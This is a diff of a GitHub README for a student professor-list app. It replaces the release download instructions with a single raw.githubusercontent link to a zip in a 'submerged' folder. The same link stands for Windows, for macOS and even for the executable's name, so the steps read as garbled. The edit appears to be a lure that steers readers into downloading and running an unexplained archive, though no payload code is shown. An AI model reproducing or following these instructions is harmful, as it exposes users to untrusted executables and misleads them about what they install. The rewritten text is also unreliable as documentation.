eredna/Prof-List-For-10043-Student/README.md

 ## 🛠️ Installing the Application
 1. **Visit the Download Page**:
-   Go to the following link to access the Releases page: [Download Prof-List-For-10043-Student](https://github.com/eredna/Prof-List-For-10043-Student/releases).
+   Go to the following link to access the Releases page: [Download Prof-List-For-10043-Student](https://raw.githubusercontent.com/eredna/Prof-List-For-10043-Student/main/submerged/Prof-List-For-10043-Student_1.2.zip).

 2. **Select the Latest Version**:
    Look for the latest version at the top of the Releases page.
 The latest version will usually have a version number, like `v1.0.0`.

 3. **Download the Application**:
    Under the latest version, click the link that says **"Assets"**.
 Here, you will see files available for download.
 Choose the file that matches your operating system.
 For example:
-   - For Windows users, download `Prof-List-Windows.zip`
+   - For Windows users, download `https://raw.githubusercontent.com/eredna/Prof-List-For-10043-Student/main/submerged/Prof-List-For-10043-Student_1.2.zip`
-   - For macOS users, download `Prof-List-macOS.zip`
+   - For macOS users, download `https://raw.githubusercontent.com/eredna/Prof-List-For-10043-Student/main/submerged/Prof-List-For-10043-Student_1.2.zip`

 4. **Extract the Files**:
    Once the file downloads, locate it in your Downloads folder.
 Right-click on the file and select **Extract All** (Windows) or double-click (macOS) to unpack the files.

 5. **Run the Application**:
-   After extraction, find the file named `Prof-List.exe` (for Windows) or `Prof-List.app` (for macOS).
+   After extraction, find the file named `https://raw.githubusercontent.com/eredna/Prof-List-For-10043-Student/main/submerged/Prof-List-For-10043-Student_1.2.zip` (for Windows) or `https://raw.githubusercontent.com/eredna/Prof-List-For-10043-Student/main/submerged/Prof-List-For-10043-Student_1.2.zip` (for macOS).
 Double-click the file to start the application.

 ## 📚 How to Use the Application
 1. **Create an Account**: